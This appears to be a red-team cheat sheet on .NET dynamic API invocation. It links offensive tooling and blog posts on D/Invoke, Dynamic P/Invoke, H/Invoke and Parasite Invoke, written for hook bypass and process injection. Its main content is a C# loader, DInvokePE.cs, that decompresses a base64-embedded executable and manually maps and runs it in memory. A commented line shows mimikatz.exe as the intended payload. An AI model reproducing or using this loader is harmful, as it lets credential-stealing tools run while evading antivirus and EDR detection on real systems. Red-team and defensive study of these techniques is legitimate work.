# .NET Dynamic API Invocation

## D/Invoke

* <https://dinvoke.net/>
* <https://thewover.github.io/Dynamic-Invoke/>
* <https://github.com/TheWover/DInvoke>
* <https://web.archive.org/web/20210601171512/https://rastamouse.me/blog/process-injection-dinvoke/>
* <https://github.com/S3cur3Th1sSh1t/Creds/blob/master/Csharp/Dinvoke_CreateRemoteThread.cs>
* <https://blog.nviso.eu/2020/11/20/dynamic-invocation-in-net-to-bypass-hooks/>
* <https://offensivedefence.co.uk/posts/dinvoke-syscalls/>

### Run PE From Memory

* <https://github.com/S3cur3Th1sSh1t/Creds/blob/master/Csharp/PE_Loader_DInvoke_ManualMap.cs>

{% code title="DInvokePE.cs" %}

```csharp
using System;
using System.IO;
using System.IO.Compression;

namespace DInvokePE
{
    public class Program
    {
        static byte[] Compress(byte[] data)
        {
            var output = new MemoryStream();
            using (var dStream = new DeflateStream(output, CompressionLevel.Optimal))
                dStream.Write(data, 0, data.Length);

            return output.ToArray();
        }

        static byte[] Decompress(byte[] data)
        {
            var input = new MemoryStream(data);
            var output = new MemoryStream();
            using (var dStream = new DeflateStream(input, CompressionMode.Decompress))
                dStream.CopyTo(output);

            return output.ToArray();
        }

        public static void Main(string[] args)
        {
            /*
            var rawBytes = File.ReadAllBytes(@"C:\Users\user\Desktop\mimikatz.exe");
            var compressed = Compress(rawBytes);
            var compressedB64 = Convert.ToBase64String(compressed);
            Console.WriteLine(compressedB64);
            */

            var compressed = Convert.FromBase64String("");
            var rawBytes = Decompress(compressed);
            var map = DInvoke.ManualMap.Map.MapModuleToMemory(rawBytes);
            DInvoke.DynamicInvoke.Generic.CallMappedPEModule(map.PEINFO, map.ModuleBase);
            Console.ReadLine();
        }
    }
}
```

{% endcode %}

## Dynamic P/Invoke

* <https://bohops.com/2022/04/02/unmanaged-code-execution-with-net-dynamic-pinvoke/>
* <https://github.com/bohops/DynamicDotNet>

## H/Invoke & NixImports

* <https://dr4k0nia.github.io/posts/HInvoke-and-avoiding-PInvoke/>
* <https://gist.github.com/dr4k0nia/95bd2dc1cc09726f4aaaf920b9982f9d>
* <https://dr4k0nia.github.io/posts/NixImports-a-NET-loader-using-HInvoke/>
* <https://github.com/dr4k0nia/NixImports>

## Parasite Invoke

* <https://github.com/MzHmO/Parasite-Invoke>